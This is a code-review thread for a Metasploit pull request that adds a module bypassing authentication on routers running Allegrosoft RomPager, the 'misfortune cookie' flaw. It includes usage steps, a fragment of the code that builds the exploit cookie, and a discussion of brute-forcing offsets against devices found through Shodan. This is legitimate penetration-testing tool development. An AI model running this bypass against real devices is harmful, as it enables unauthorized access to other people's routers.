### PR TITLE
Add auxiliary RomPager misfortune cookie authentication bypass

### PR DESCRIPTION
**Pull request by j91321**
New module for authentication bypass on devices running Allegrosoft RomPager vulnerable to misfortune cookie vulnerability.

I don't know how to do reliable fingerprinting of vulnerable devices, so user has to pick the right device from list. I implemented the `device` command to print table with vulnerable devices and known values used for exploitation. 

My first module so tell me if something is not according to the guidelines.

## Verification

Run against one of devices with firmware listed in docs

- Start msfconsole
- Do: ```use auxiliary/admin/http/allegro_rompager_auth_bypass```
- Do: ```set rhost <ip>```
- Do: ```set rport <port>```
- Do: ```set device <device-id>```
- Do: ```run```
- You should be able to login into the device without authentication

### CODE REVIEW

File: documentation/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.md [hunk 1]
```diff
@@ -0,0 +1,234 @@
...
+  7. You should be able to login into the device without authentication
+  
+## Scenarios
+
+  Example run against TP-Link TD-8840T with firmware V2_100525:
+```
+msf > use auxiliary/admin/http/allegro_rompager_auth_bypass 
+msf auxiliary(allegro_rompager_auth_bypass) > devices
+
+List of vulnerable devices
```
Comment (h00die) [inline documentation/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.md]: Having this in the docs twice is pretty long and repetitive. I'd vote to remove this (2nd block).
Maybe list the first 3, then do "...clip..." or something similar afterwards.  This way you show its a function, w/o taking up as much space.

File: modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb [hunk 2]
```diff
@@ -0,0 +1,280 @@
...
+    end
+    print tbl.to_s
+  end
+
+  def run
+    cookie = ''
+    begin
+      cookie_number = devices_list[datastore['DEVICE']][:number].to_s
+      cookie_offset = devices_list[datastore['DEVICE']][:offset]
+      cookie = 'C' + cookie_number + '=' + 'B' * cookie_offset + "\x00"
```
Comment (h00die) [inline modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb]: `cookie = "C#{cookie_number}=#{'B'*cookie_offset}\x00"`

File: modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb [hunk 3]
```diff
@@ -0,0 +1,280 @@
...
+    rescue
+      print_error('Device number is out of range, please run devices to see list of vulnerable devices')
+    end
+    print_status('Device name: ' + devices_list[datastore['DEVICE']][:name])
```
Comment (h00die) [inline modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb]: "Device name: #{devices_list[datastore['DEVICE']][:name]}"

File: modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb [hunk 4]
```diff
@@ -0,0 +1,280 @@
...
+    print_status('Device model: ' + devices_list[datastore['DEVICE']][:model])
```
Comment (h00die) [inline modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb]: see above comment

File: modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb [hunk 5]
```diff
@@ -0,0 +1,280 @@
...
+    print_status('Device firmware: ' + devices_list[datastore['DEVICE']][:fw])
```
Comment (h00die) [inline modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb]: see above comment

**Comment by h00die** [comment]
Please also run [msftidy](https://github.com/rapid7/metasploit-framework/wiki/Landing-Pull-Requests) to get rid of the travis error.

**Comment by void-in** [comment]
@j91321 Looking at the research and your documentation example, two things:

1. The model number is returned in the basic authentication header in the realm
2. We can send different offsets without crashing the running firmware (assumed from the doc usage example where the first attempt failed while the second one succeeded)

If the above assumptions are correct, perhaps we can brute force all the offsets of a particular model once it is returned in the authentication header?

**Comment by j91321** [comment]
@void-in It looks like you are right I checked using shodan and all devices I was able to find return model in the authentication header. 

I have never experienced crash when testing with the offsets of the same model. Although I can't be 100% sure it's probably safe to assume that brute forcing the offsets is safe. I'll implement the suggestions.

**Comment by j91321** [comment]
This is the best solution for device detection I could come up with. I tested it on a few devices and I believe it works fine.  Also fixed that msftidy warning. I hope it's ok now.

**Comment by void-in** [comment]
@j91321 Excellent. One more thing: please remove the default RHOST value. For the sake of documentation, you can specify a private IP address such as 192.168.1.1

**Comment by j91321** [comment]
@void-in I'm not sure what do you mean, the documentation example now contains only 192.168.1.1 as RHOST value.

**Comment by void-in** [comment]
@j91321 Never mind. The last commit changed the value. I must have been looking at the original PR. Sorry for the confusion.

**Comment by busterb** [comment]
Nice work @j91321! I don't have anything to add.

**Comment by busterb** [comment]
Added 052bf7d99c fixing some documentation format issues.

**Comment by busterb** [comment]
## Release Notes

This adds a module for authentication bypass on devices running a vulnerable version of Allegrosoft RomPager. See http://mis.fortunecook.ie/ for more information.

**Pull request merged**